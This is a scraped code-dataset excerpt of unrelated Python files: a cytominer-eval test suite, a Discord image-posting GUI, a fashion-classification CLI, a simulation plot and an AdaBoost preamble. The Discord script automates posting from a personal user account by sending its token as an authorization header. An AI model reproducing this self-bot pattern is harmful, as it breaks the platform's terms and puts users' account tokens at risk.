"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.ext.automap.automap_base",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.ravel",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.ravel",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.min",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 79,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.strftime",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.min",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 96,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 109,
"usage_type": "call"
}
] |
28800553771
|
import os
import pytest
import pathlib
import numpy as np
import pandas as pd
from math import isclose
from cytominer_eval.operations import mp_value
from cytominer_eval.utils.mpvalue_utils import (
calculate_mp_value,
calculate_mahalanobis,
)
# Load CRISPR dataset
example_file = "SQ00014610_normalized_feature_select.csv.gz"
example_file = pathlib.Path(
"{file}/../../example_data/gene/{eg}".format(
file=os.path.dirname(__file__), eg=example_file
)
)
df = pd.read_csv(example_file)
meta_features = [
x for x in df.columns if (x.startswith("Metadata_") or x.startswith("Image_"))
]
features = df.drop(meta_features, axis="columns").columns.tolist()
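# These perturbations form the negative-control population used throughout the tests below.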
control_perts = ["Luc-2", "LacZ-2", "LacZ-3"]
replicate_id = "Metadata_pert_name"
def test_calculate_mahalanobis():
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
maha = calculate_mahalanobis(pert_df=sub_df, control_df=control_df)
assert isinstance(maha, float)
# The following value is empirically determined
# and not theoretically justified but avoids unwanted
# changes in the implementation of the Mahalanobis distance
assert isclose(maha, 3.62523778789, abs_tol=1e-09)
maha = calculate_mahalanobis(pert_df=control_df, control_df=control_df)
# Distance to itself should be approximately zero
assert isclose(maha, 0, abs_tol=1e-05)
def test_calculate_mp_value():
# The mp-values are empirical p-values
# so they range from 0 to 1, with low values
# showing a difference to the control condition.
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
# Avoid fluctuations in permutations
np.random.seed(2020)
result = calculate_mp_value(pert_df=sub_df, control_df=control_df)
assert isinstance(result, float)
assert result > 0
assert result < 1
# Distance to itself should be approximately zero
# So mp-value should be 1
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"nb_permutations": 2000}
)
assert isclose(result, 1, abs_tol=1e-02)
with pytest.raises(AssertionError) as ae:
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"not_a_parameter": 2000}
)
assert "Unknown parameters provided. Only" in str(ae.value)
def test_mp_value():
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
)
assert "mp_value" in result.columns
assert all(result.mp_value <= 1)
assert all(result.mp_value >= 0)
assert len(np.unique(df[replicate_id])) == len(result)
with pytest.raises(AssertionError) as ae:
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
params={"not_a_parameter": 2000},
)
assert "Unknown parameters provided. Only" in str(ae.value)
|
cytomining/cytominer-eval
|
cytominer_eval/tests/test_operations/test_mp_value.py
|
test_mp_value.py
|
py
| 3,230 |
python
|
en
|
code
| 7 |
github-code
|
6
|
[
{
"api_name": "pathlib.Path",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mahalanobis",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mahalanobis",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.operations.mp_value",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.operations.mp_value",
"line_number": 102,
"usage_type": "call"
}
] |
14235086016
|
from http.client import HTTPSConnection
from tkinter import filedialog as fd
from tkinterdnd2 import *
from threading import *
from tkinter import *
from json import *
from sys import *
from tkinter import ttk
from time import sleep
import tkinter as tk
import pyimgur
import random
import sys
'''
GUIDES I USED
https://www.quora.com/I-want-to-automatically-post-a-message-every-24-hours-on-my-Discord-server-using-my-own-account-not-a-bot-account-Is-this-possible-and-if-so-how # STARTING POINT, REMOTE SENDER
https://www.pythontutorial.net/tkinter/tkinter-open-file-dialog/ # FILE DIALOG
https://pythonguides.com/python-tkinter-drag-and-drop/ # DRAG AND DROP FEATURE FOR MULTIPLE FILES
https://www.tutorialspoint.com/taking-input-from-the-user-in-tkinter # ADDING INPUT ENTRY WIDGETS
https://www.youtube.com/watch?v=lvky-tmoTvg # HOW TO USE IMGUR API, SIMPLE
https://www.delftstack.com/howto/python/python-replace-line-in-file/ # HOW TO REPLACE IMAGE PATHS ON DISK INTO POSTABLE IMGUR LINKS
https://www.geeksforgeeks.org/how-to-use-thread-in-tkinter-python/ # USEFUL EXAMPLE, SIMPLIFICATION OF THREADING
'''
'''↓↓↓↓ PROGRAM DOES NOT WORK WITHOUT!! ↓↓↓↓'''
TOKEN = '' # FOR EX. OTM1MjUzMjI2MjY0MDY4MjM3.Ye7-rA.w3WsZ0DpCr4lKYurKPa_bLUodBQ
IMGUR_ID = '' # FOR EX. 19a12e239az128h
CHANNEL_ID = '' # FOR EX. 123821903821083257
'''↑↑↑↑ FOR PERSONAL USE: ONLY TOUCH THESE 3 SPECIFIERS ABOVE, TOKEN, IMGUR_ID, and CHANNEL_ID ↑↑↑↑'''
'''TOKEN is your discord token, BE CAUTIOUS ABOUT THIS USE. View the program below if you are unsure about its usage.
IMGUR_ID is the API key that Imgur gives you once you sign up. Or you can use any image uploader service; Discord will convert image links to images.
CHANNEL_ID is the ID of the discord channel (enable developer view, copy the ID of the text channel, assuming image perms).
Examples are FAKE/THROWAWAYS, use a credible ID.
'''
global temporary_widget # DO NOT TOUCH
class Client:
'''
Draws the GUI responsible for selecting image files to send to a discord channel.
Notably a Drag and drop feature (can use multiple files but dragged one at a time)
or through a file dialog.
'''
def __init__(self):
self.main = TkinterDnD.Tk()
self.main.title('Discord ImageBot')
self.main.geometry('450x650')
self.main.resizable(False, False)
self.main.config(bg='#36393f')
self.send_condition = tk.BooleanVar()
self.send_condition.set(True)
self.stop_condition = tk.BooleanVar()
self.stop_condition.set(True)
self.seconds_btwn_msg = 1 # minutes between sending each image; the value is multiplied by 60 before sleeping
self.seconds_before_stop = 360000 # minutes before sending stops automatically
self.image_paths = []
self.temp_widget = Label()
self._draw()
self.main.mainloop()
def _draw(self):
global temporary_widget
widget_text = 'Corbel 10 bold'
# - - - - - - - - - - - - - - - - - - - - -
# Open File System
open_image_files = tk.Button(bg='#7289DA', fg='white', font='Corbel 12 bold', text='Open Image Files',
command=self.select_files)
open_image_files.pack(pady=10)
OR = Label(anchor=CENTER, text='OR', bg='#36393f', fg='white', font=widget_text)
OR.pack()
drag_and_drop = Label(anchor=CENTER, text='Drag & Drop Images', bg='#36393f', fg='white',
font='Corbel 14 bold')
drag_and_drop.pack()
listbox = Listbox(width=45, height=15, bg='#36393f', fg='#FFFFFF', selectmode=EXTENDED)
self.temp_widget = listbox
listbox.pack()
send_dropped_files = tk.Button(bg='#36393f', fg='white', font=widget_text, text='Send Dropped Files',
command=self.threading)
send_dropped_files.pack(pady=10)
listbox.drop_target_register(DND_FILES)
listbox.dnd_bind('<<Drop>>', self.add_to_listbox)
# - - - - - - - - - - - - - - - - - - - - -
# Connection Status bar
frame = Frame(pady=20, padx=20)
frame.config(bg='#36393f')
frame.pack()
separator = ttk.Separator(frame, orient=tk.HORIZONTAL)
separator.grid(row=0, sticky='ew', pady=10, columnspan=10)
# - - - - - - - - - - - - - - - - - - - - -
# Time Interval Section
interval_label = Label(frame, bg='#36393f', fg='white', font=widget_text, text='Time Between Message (min)')
interval_label.grid(row=2, column=0)
time_interval_entry = tk.Entry(frame, bg='#36393f', fg='white', font=widget_text)
temporary_widget = time_interval_entry
time_interval_entry.grid(row=2, column=1, columnspan=4, padx=10)
update_button = tk.Button(frame, bg='#36393f', fg='white', font=widget_text, text='Update', command=self.set_interval)
update_button.grid(row=2, column=5)
# - - - - - - - - - - - - - - - - - - - - -
# Stop Later Section
stop_later_label = Label(frame, bg='#36393f', fg='white', font=widget_text, text='Stop Later (min)')
stop_later_label.grid(row=3, column=0)
stop_later_entry = tk.Entry(frame, bg='#36393f', fg='white', font=widget_text)
# temporary_widget = stop_later_entry # doesnt work when you have multiple global carriers
stop_later_entry.grid(row=3, column=1, columnspan=4, padx=10)
update_button2 = tk.Button(frame, bg='#36393f', fg='white', font=widget_text, text='Update', command=self.later_interval)
update_button2.grid(row=3, column=5)
# - - - - - - - - - - - - - - - - - - - - -
# Stop Button
stop_button = tk.Button(bg='#ce524d', fg='white', font=widget_text, text='Stop Sending', command=self.turn_off_sending)
stop_button.pack()
# - - - - - - - - - - - - - - - - - - - - -
# Quit button
quit_button = tk.Button(bg='#ce524d', fg='white', font=widget_text, text='Quit', command=self.quit)
quit_button.pack(expand=True)
def add_to_listbox(self, event):
event.data = str(event.data).strip("{}[](),'") # get rid of unusual symbols
self.temp_widget.insert('end', event.data) # inserts the event.data to be displayed in the Listbox
self.image_paths.append(event.data)
def select_files(self):
'''
The file dialog. Responsible for opening a file dialog window for the user so that you may select an image
or multiple images to send to a discord channel.
'''
filetypes = (
('Image files', '*.png *.jpg *.jpeg *.tif *.tiff *.bmp *.gif *.eps *.raw'),
('All files', '*.*')
)
filepaths = fd.askopenfilenames(
# opens the file dialog, also creates a tuple of the file paths
# specified by options that are keyword arguments
title='Open files',
filetypes=filetypes)
filepaths = list(filepaths)
self.image_paths = filepaths
self.threading()
def write_to_file(self):
'''
Addresses obscure error with dragging 2 files, and then dragging in a previously dragged in file, resulting in an
incorrectly formatted list, and makes sure that each image path gets its own individual line.
'''
ordered_image_paths = []
for image_path in self.image_paths:
elem = image_path.split()
ordered_image_paths += elem
self.image_paths = ordered_image_paths # even if the list was initially correctly ordered,
# it would still be set correctly (nothing changes)
# ensure that one path gets one line
with open('some_images.txt', 'w') as output:
for image in self.image_paths:
output.write(str(image) + '\n')
def turn_off_sending(self):
self.send_condition.set(False)
def send_images(self):
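# Upload the selected images to Imgur, then post one random link to the channel every interval until stopped.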
self.write_to_file()
ImgurClient().imgur_convert()
wp = WritePhrase()
print('NEW RUN')
print('-' * 20)
while self.send_condition.get() and self.stop_condition.get():
wp.sender('some_images.txt') # this is the file we make
if self.seconds_btwn_msg == '':
print('why is this true') # this happens when you have multiple objects assigned to the global temporary_widget
self.seconds_btwn_msg = '1'
min = int(self.seconds_btwn_msg) * 60
print('min: ', min)
sleep(min)
def set_interval(self):
if self.temp_widget != '':
global temporary_widget
self.seconds_btwn_msg = temporary_widget.get()
print('min: ', self.seconds_btwn_msg)
def later_interval(self):
if self.temp_widget != '':
global temporary_widget
self.seconds_before_stop = temporary_widget.get()
print(self.seconds_before_stop)
def threading(self):
t1 = Thread(target=self.send_images) # simplest way to use a thread is to instantiate with a target function
t1.start() # and then call start
def threading2(self):
t2 = Thread(target=self.timed_loop)
t2.start()
def timed_loop(self):
min = int(self.seconds_before_stop) * 60
sleep(min)
self.stop_condition.set(False)
def quit(self):
self.turn_off_sending()
self.main.destroy()
sys.exit(-1) # defined in system, sys.exit()
class WritePhrase:
'''
Responsible for actually sending the message, in this case an imgur link to an image, to a specific discord channel.
Given the discord user's token, the host (discordapp.com) and the ID of the discord channel (acts as a link)
'''
def __init__(self):
self.used_phrases = []
@staticmethod
def get_connection():
return HTTPSConnection('discordapp.com') # similar to the smp_conn object we instantiated before
# this HTTPSConnection object can be used to authenticate, read, write and return messages
@staticmethod
# static because its not bound to the object of the class, just sending
def send_message(conn, channel_id, message_data):
"""
request of HTTP takes method, url, body, and headers
Get Channel Messages:
/channels/{channel.id}/messages
:param conn:
:param channel_id:
:param message_data:
:return:
"""
header_data = {
'content-type': 'application/json',
'authorization': TOKEN,
'host': 'discordapp.com',
}
conn.request('POST', f'/api/v9/channels/{channel_id}/messages', message_data, header_data)
resp = conn.getresponse() # called after a request is sent to the server.
# returns an HTTPResponse instance
# you must read responses before sending new requests
if 199 < resp.status < 300:
print(f'Message {message_data} sent')
else:
stderr.write(f'Received HTTP {resp.status}: {resp.reason}\n')
def sender(self, file):
message = self.random_line(file)
message_data = {
'content': message,
'tts': 'false',
}
self.send_message(self.get_connection(), CHANNEL_ID, dumps(message_data))
def random_line(self, file_name) -> str:
new_phrases = open(file_name).readlines() # compute a list of lines WITH all the '\n' characters at the end
if len(self.used_phrases) == len(new_phrases):
self.used_phrases = []
print()
used_phrase = random.choice(new_phrases)
while used_phrase in self.used_phrases:
used_phrase = random.choice(new_phrases)
self.used_phrases.append(used_phrase)
return used_phrase
class ImgurClient:
'''
Client connects with Imgur, replaces the paths of selected images from file dialog or drag and drop and converts them
to discord links so that they may be successfully posted on discord.
'''
@staticmethod
def imgur_convert():
file = open('some_images.txt', 'r')
replacement = ''
for image_path in file:
image_path = image_path.strip() # line must be stripped (removed of whitespaces AND line breaks) or its an invalid argument
im = pyimgur.Imgur(IMGUR_ID) # connect with Imgur
image = im.upload_image(image_path) # upload the image from its path
change = image_path.replace(image_path, image.link) + '\n' # replace the current line (image path)
# with its created imgur link
replacement += change # updating replacement with the change
file.close()
# dividing it into reading then writing avoids confusion and errors
fout = open('some_images.txt', 'w') # resets the file, 'w' creates a new file if file opened already exists
fout.write(replacement) # because the write() method doesn't automatically add \n
fout.close()
if __name__ == '__main__':
Client()
|
vaperyy/ImageBot_for_Discord
|
image_bot.py
|
image_bot.py
|
py
| 13,058 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "tkinter.BooleanVar",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "tkinter.BooleanVar",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "tkinter.ttk.Separator",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "tkinter.ttk",
"line_number": 111,
"usage_type": "name"
},
{
"api_name": "tkinter.HORIZONTAL",
"line_number": 111,
"usage_type": "attribute"
},
{
"api_name": "tkinter.Entry",
"line_number": 119,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "tkinter.Entry",
"line_number": 131,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog.askopenfilenames",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 164,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 239,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "http.client.HTTPSConnection",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "pyimgur.Imgur",
"line_number": 333,
"usage_type": "call"
}
] |
19200731938
|
import argparse
from inference import Inference
from model import FashionModel
from train import Trainer
from data import TrainDataset
class ArgumentSelectError(Exception):
pass
def training():
train_dataset = TrainDataset(
image_dir=args.train_data_dir,
csv_path_train=f'data/dataset_csv/list_combined_{args.train_type}_small_train.tsv',
csv_path_val=f'data/dataset_csv/list_combined_{args.train_type}_small_val.tsv',
train_type=args.train_type,
batch_size=16,
shuffle=True,
random_seed=60,
image_shape=args.input_shape
)
fm = FashionModel()
fm.create_model(num_classes=train_dataset.num_classes, input_shape=[args.input_shape[0], args.input_shape[1], 3])
if args.checkpoint is not None:
fm.model.load_weights(args.checkpoint)
fm.model.summary()
trainer = Trainer(
model=fm.model,
train_gen=train_dataset.train_generator,
val_gen=train_dataset.validation_generator,
epoch=args.epoch,
step=args.step
)
trainer.train(log_dir=args.log_dir)
def inference():
inf = Inference(model_path=f'models/{args.predict_type}.h5',
sample_dir='samples',
inference_type=args.predict_type,
inference_csv=f'data/{args.predict_type}.csv')
inf.predict(save_result=True)
total_types = ['category', 'attribute', 'attribute1', 'attribute2', 'attribute3', 'attribute4', 'attribute5']
parser = argparse.ArgumentParser(
prog='Fashion Category and Attribute Prediction',
add_help=True,
description='This program predicts categories, textures(attribute1),'
'fabrics(attribute2), shapes(attribute3), parts(attribute4),'
'and styles(attribute5).'
)
parser.add_argument('-t', '--train', action='store_true',
help='Trains model with `--train-data-dir` and `--train-data-csv`.')
parser.add_argument('--train-type', type=str,
help='Selects which type will be trained. eg. `category`, `attribute1`.')
parser.add_argument('--train-data-dir', type=str,
help='Path to the training data folder.')
parser.add_argument('--input-shape', type=int, nargs=2,
help='Input image shape as two integers, e.g. 224 224.')
parser.add_argument('--epoch', type=int,
help='Number of epochs to train.')
parser.add_argument('--step', type=int,
help='Number of steps per epoch.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Path to a checkpoint to resume training from; trains from scratch if omitted.')
parser.add_argument('--log-dir', type=str,
help='Directory where training logs will be saved.')
parser.add_argument('-p', '--predict', action='store_true',
help='Inference model with `--sample-folder`.')
parser.add_argument('--predict-type', type=str,
help='Selects which type will be predicted. eg. `category`, `attribute1`.')
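# Example invocations (paths and values below are illustrative only):
#   python main.py --train --train-type category --train-data-dir data/img --input-shape 224 224 --epoch 10 --step 500 --log-dir logs
#   python main.py --predict --predict-type category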
if __name__ == '__main__':
args = parser.parse_args()
try:
if args.train:
if args.train_data_dir is None:
raise ArgumentSelectError('Train data directory not specified. Can not train!')
elif args.log_dir is None:
raise ArgumentSelectError('Log directory not specified. Can not train!')
elif not any([args.train_type == train_type for train_type in total_types]):
raise ArgumentSelectError('Train type not specified. Can not train!')
else:
print('Training!')
training()
print('Training Finished!')
elif args.predict:
if not any([args.predict_type == pred_type for pred_type in total_types]):
raise ArgumentSelectError('Predict type not specified. Can not predict.')
else:
print('Inference!')
inference()
print('Inference Completed!')
except ArgumentSelectError as err:
print(err)
print('Please enter right arguments!')
|
omerferhatt/deep-fashion-classification
|
main.py
|
main.py
|
py
| 4,105 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "data.TrainDataset",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "model.FashionModel",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "train.Trainer",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "inference.Inference",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 52,
"usage_type": "call"
}
] |
14624971996
|
#coding:utf-8
from math import e
import numpy as np
year=150
def func(x):
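# Exponential penalty e**(g*x) for negative x, otherwise 1; g is set in the parameter loop below.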
if x<0:
return e**(g*x)
else:
return 1
x_1=[-3/float(40000)*x**2+3/float(200)*x for x in range(1,year)]
x_2=[]
T=3/2*(year-50)
a=1/T**2
for x in range(1,year):
if(x<=T):
x_2.append(a*x**2)
else:
x_2.append(1)
x_3=[1/float(100)*x for x in range(1,year)]
x_5=[]
halfyear=year/2
for x in range(1,year):
if(x<=halfyear):
x_5.append(1/halfyear**2*x*x)
else:
x_5.append(-(x-year)**2/halfyear**2+1)
import matplotlib.pyplot as plt
fig=plt.figure(1)
ax={}
number=0
sigma=0.008
for k in [0.01,0.02,0.03]:
for g in [0.003,0.005,0.008]:
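# One subplot per (k, g) pair; a single noise draw (rand) is reused for every year, and the five curves are the strategies labelled below.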
rand=np.random.normal(0,sigma)
c_1 = [0.01]
c_2 = [0.01]
c_3 = [0.01]
c_4 = [0.01]
c_5 = [0.01]
for i in range(1,year):
c_1.append(min(k*(1-x_1[i-1])*(1-c_1[i-1])+func(x_1[i-1]-c_1[i-1])*c_1[i-1]+rand,1))
c_2.append(min(k * (1 - x_2[i-1]) * (1 - c_2[i-1]) + func(x_2[i-1] - c_2[i-1]) * c_2[i-1]+rand,1))
c_3.append(min(k * (1 - x_3[i-1]) * (1 - c_3[i-1]) + func(x_3[i-1] - c_3[i-1]) * c_3[i-1]+rand,1))
c_5.append(min(k * (1 - x_5[i-1]) * (1 - c_5[i-1]) + func(x_5[i-1] - c_5[i-1]) * c_5[i-1]+rand,1))
for i in range(1,year):
c_4.append(min(k * (1 - c_4[i-1]) * (1 - c_4[i-1]) + func(c_4[i-1] - c_4[i-1]) * c_4[i-1]+rand,1))
ax[number]=fig.add_subplot(331+number)
plt.title('k=%.3f,g=%.3f'%(k,g))
plt.plot(c_1,label='quadric')
plt.plot(c_2,label='convex')
plt.plot(c_3,label='static')
plt.plot(c_4,label='dynamic')
plt.plot(c_5,label='logistics')
number=number+1
ax[8].legend(loc='lower center',shadow=True,bbox_to_anchor=(1.2, 1.4),borderaxespad = 0.)
plt.show()
|
liangzp/2018-American-Interdisciplinary-Contest-in-Modeling
|
Code/random_model.py
|
random_model.py
|
py
| 1,910 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "math.e",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "numpy.random.normal",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 65,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 70,
"usage_type": "name"
}
] |
5637517912
|
from urllib.request import urlopen
from datetime import datetime
import json
from settings import my_lec_list, base_url
class InfoList(object):
def __init__(self):
self.json = self.get_api()
self.table = self.json["table"]
self.count = self.json["count"]
self.body = self.json["body"]
self.my_list = self.set_my_info()
@staticmethod
def get_api():
api = urlopen(base_url + "info/")
s = api.read().decode('utf-8')
return json.loads(s)
@staticmethod
def identify(subject):
if subject in my_lec_list:
return True
else:
return False
def set_ids(self):
id_list = []
for b in self.body:
judge = self.identify(b["subject"])
if judge:
id_list.append(b["id"])
else:
pass
return id_list
def set_my_info(self):
detail_list = []
for id in self.set_ids():
d = InfoDetail(id)
detail_list.append(d)
return detail_list
class InfoDetail(object):
def __init__(self, info_id):
self.id = info_id
self.json = self.get_api()
self.subject = self.json["subject"]
self.teacher = self.json["teacher"]
self.abstract = self.json["abstract"]
self.detail = self.json["detail"]
self.created_at = self.convert_date(self.json["time"]["created_at"])
self.last_update = self.convert_date(self.json["time"]["last_update"])
self.last_confirm = self.convert_date(self.json["time"]["last_confirm"])
def get_api(self):
api = urlopen(base_url + "info/id/" + str(self.id))
s = api.read().decode('utf-8')
return json.loads(s)
@staticmethod
def convert_date(d):
l = len(d)
if l > 11:
return datetime.strptime(d, "%Y/%m/%d %H:%M:%S")
else:
return datetime.strptime(d, "%Y/%m/%d")
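# Illustrative behaviour: "2017/04/01 12:34:56" (length > 11) is parsed with the
# "%Y/%m/%d %H:%M:%S" format, while "2017/04/01" falls back to "%Y/%m/%d".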
if __name__ == "__main__":
i = InfoList()
for detail in i.my_list:
print(type(detail))
print(detail.subject)
print(detail.created_at.strftime("%Y-%m-%d %H:%M:%S"))
|
pddg/learning
|
models.py
|
models.py
|
py
| 2,174 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "urllib.request.urlopen",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "settings.base_url",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "settings.my_lec_list",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "urllib.request.urlopen",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "settings.base_url",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 69,
"usage_type": "name"
}
] |
72333132669
|
"""
@File : AdaBoost.py
@Time : 2020-05-26
@Author : BobTsang
@Software: PyCharm
@Email : [email protected]
"""
# This time the breast cancer dataset is used for a binary classification task, because the iris dataset is too small and has too few features to suit a boosting tree.
# Dataset: 569x31
# time:62s
import pandas as pd
import numpy as np
from sklearn import datasets
import random
import time
# Shuffle the data by hand instead of calling sklearn's shuffle
def Random_number(data_size):
"""
This function uses shuffle() to shuffle a list of integers from 0 to the dataset size; without a fixed seed every run would split the data differently and give different results.
Improvement:
set a random seed so that the shuffled index list, and hence the split, is the same on every run.
:param data_size: size of the dataset
:return: a shuffled list of indices
"""
num_set = []
random.seed(1)
for i in range(data_size):
num_set.append(i)
random.shuffle(num_set)
return num_set
def Train_test_split(data_set, target_data, size=0.2):
"""
Note: splits the dataset; a fraction `size` (0.2 by default) of the data is used as the test set.
:param data_set: dataset
:param target_data: label data
:param size: fraction of the dataset used as the test set
:return: training data, test data, training labels, test labels
"""
# number of samples in the training set
train_size = int((1 - size) * len(data_set))
